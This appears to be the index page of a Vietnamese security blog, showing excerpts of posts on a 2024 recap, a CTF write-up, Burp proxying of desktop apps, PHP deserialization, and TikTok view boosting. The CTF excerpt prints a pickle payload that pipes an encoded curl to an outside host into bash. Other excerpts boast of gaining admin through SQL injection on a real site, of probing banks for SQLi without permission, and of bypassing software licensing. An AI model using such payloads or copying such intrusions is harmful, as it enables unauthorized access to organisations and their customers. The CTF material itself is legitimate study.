Bài đăng

Tanr man 2024

 Tản mạn về năm 2024 của Spycio.Kon Một số thành tích nổi bật trong năm - Tự tay host một ctf nhỏ cho team từ A-Z - Tham gia kì thi lấy chứng chỉ quốc tế với tổng thiệt hại là hơn 500$, 20 ngày mất ngủ và 3 tháng ôn tập (mình được một anh đẹp zai hỗ trợ thi hihi), mặc dù chỉ được 2/3 chặng đường (fail) T__T. Em xin lỗi anh rất nhiều. - Đã giải được một số challenges ở một số giải ctf mà năm trước mình khó có thể giải được - Đã viết POC cho một số CVE mình chơi và được một số trang web crawl trúng, khá vui ^^ https://cve.imfht.com/poc_detail/75cc08888950aec9e37a3c206652083d271746e4 https://cvefeed.io/vuln/detail/CVE-2023-41425 https://154.17.20.211 - Nói chuyện được với một số idol quốc tế như IRELAND WITHOUT RE, Microsoft/Synack redteamer/bug hunter,... - Đã viết trên Viblo và cảm thấy bản thân đã có những đóng góp cho cộng đồng lập trình viên trong và ngoài nước mặc dù nó không có gì nhiều =))) https://viblo.asia/p/huong-dan-tao-discord-bot-bang-lm-studio-3kY4g0pyJAe https://viblo...
Hình ảnh
Here is my solution for  Pickleball and Letmein challenges. :< My team planned to join this ctf, but it seems everyone is busy. So sad. Btw thx authors for the great challenges  ---------------------------------------------------------------------------------------------------------------------------- Pickleball: You can refer to the use of opcodes for bypassing,  https://laxiisteam.blogspot.com/2023/09/kma-thi-sinh-vien-attt-cap-hoc-vien-he.html or just run my script    import base64 import pickle payload = b """(cos system S'echo Y3VybCBwamZ3MmxwNS5yZXF1ZXN0cmVwby5jb20=|base64 -d|bash' o""" ab = base64.b64encode(payload) print (ab)  Let me in: This black box challenge has 0 solves. I’ve never worked with Ruby on Rails before, so I encountered quite a few difficulties. Here’s how I approached it  Giao diện nó đây, có 2 chức năng dễ thấy là signup và signin Wappalyzer cho thấy backend có khả năng được viết bằng Ruby Step1: Path travesal View...

CPS

 https://nhienit.wordpress.com/2020/12/03/tim-hieu-ve-csp-content-security-policy/
 Xóa node_modules trong các dự án ko cần  npx npkill

MMO - Black huntres

Hình ảnh
 Hello xin chào mọi người, dạo này mình cũng đang lấn sang mảng MMO nên cũng muốn share mấy cái tips/tricks cho mọi người. Bài 1: Buff view toptop Mọi người đang bài thường bị flop à, không sao. Tool này sẽ giúp mọi người đẩy số view lên. Điền username toptop vô đây Sau đó đợi 1 lát, nhập capcha và đợi Mình buff view nên chỉ cần này thôi Rồi ok làm theo các bước tự buff là ok. Chờ 15p mỗi lần nhé <(")

forwarding requests from desktop app to burpsuite

Hình ảnh
 Bình thường hóa việc mọi người sẽ phải làm với mấy cái ứng dụng linh tinh trên Windows đi :V Một số application không hỗ trợ kết nối proxy để capture request qua burp thì phải làm sao :v Có nhiều cách để capture như dùng HTTP Debugger, Wireshark,... Ở đây mình sẽ chỉ cho mọi người một tool khá ngon mới cop nhặt được trên mạng =)) Mở bài: Proxifier Đầu tiên thì Download nó về, nó có free trial 30 ngày nhưng mà mình thì không thích lắm nên dùng key kích hoạt luôn <(") Giao diện nó như này Click Profile -> Proxy Server  Mình muốn bắt qua burp thì sẽ cấu hình như sau rồi OK  Bây giờ thử test xem nó có work hay không Ok vậy là được  Ở đây mình sẽ test với zalo.exe. Các bước thì làm như sau Qua burp và bắt req thôi, gõ đại cái gì trên Zalo đi :Vv Tuy nhiên, một số ứng dụng sẽ cần qua giao thức https nên là phải thêm cert của burp vô máy nữa. Lấy cert bằng cách sau Win + R -> nhập certmgr.msc Rồi import vô là xong. Chúc các bạn thành công. Kết bài:  Cảm ơn vì...

Yêu thương trang X như thế nào??

Lâu rồi không viết nên chỉ share lại chút kinh nghiệm thôi, chả là trang X đó dính case SQLi mà ok mình lên được quyền admin <("). Sau một thời gian, trang X đã phát hiện có đặc vụ ngầm nên họ tiến hành fix cụ thể là tiến hành đập đi xây lại, mình cũng vui vẻ vì họ cuối cùng cũng làm gì đó. Nhưng không mình check lại thì thấy trang cũ được chuyển sang 1 domain mới, còn trang mới là một trang khác có liên kết với trang cũ <(") Muhahahahaha và lỗi vẫn chưa được fix <(") Thế là lại đành viết report thôi =)))))
Hình ảnh
Insecure Deserialization trong PHP Insecure Deserialization: Là một lỗ hổng bảo mật cho phép kẻ tấn công (attacker) có thể chỉnh sửa, thay đổi kết cấu của các đối tượng (object) bằng cách tác động vào các untrust data khi tiến hành khi thực hiện Deserialize của ứng dụng. - Serialize: Khi dữ liệu muốn được lưu trữ, hay muốn truyền tải qua mạng hay một ứng dụng khác, người ta sẽ serialize dữ liệu tức là chuyển đổi dữ liệu gốc (orginal data) thành một mảng byte (byte stream). Điều này giúp cho việc chuyển tiếp dữ liệu đảm bảo được tính toàn vẹn, tối ưu hệ thống, tăng đáng kể tốc độ tính toán,... - Deserialize: Là quá trình ngược của Serialize, dùng để biến đổi mảng byte (byte stream) lại thành giữ liệu gốc dựa vào byte stream đã được cung cấp. Ý tưởng của việc tấn công này là sẽ cung cấp byte steam fake, khi ứng dụng des -> nó bị tấn công -------------------------------------------------------------- Lười sửa và viết, nào rảnh sửa lại Ví dụ về 1 bài insecure deserialize bằng PHP ...
 Tất cả lab tôi làm về windows + liar + s1mple +zero + DC01 ... + lab htb

Tiền bạn là tiền của tôi, đoán xem??

Bài này chỉ để take note mình "vô tình" tìm được vài con SQL Injection nho nhỏ trong một vài banking to to và cũng ở một vài tổ chức cho sinh viên vay vốn cũng khá bình thường <(") . Mô tả cơ bản là họ chẳng thèm cho được đồng bounty nào. Buồn vkl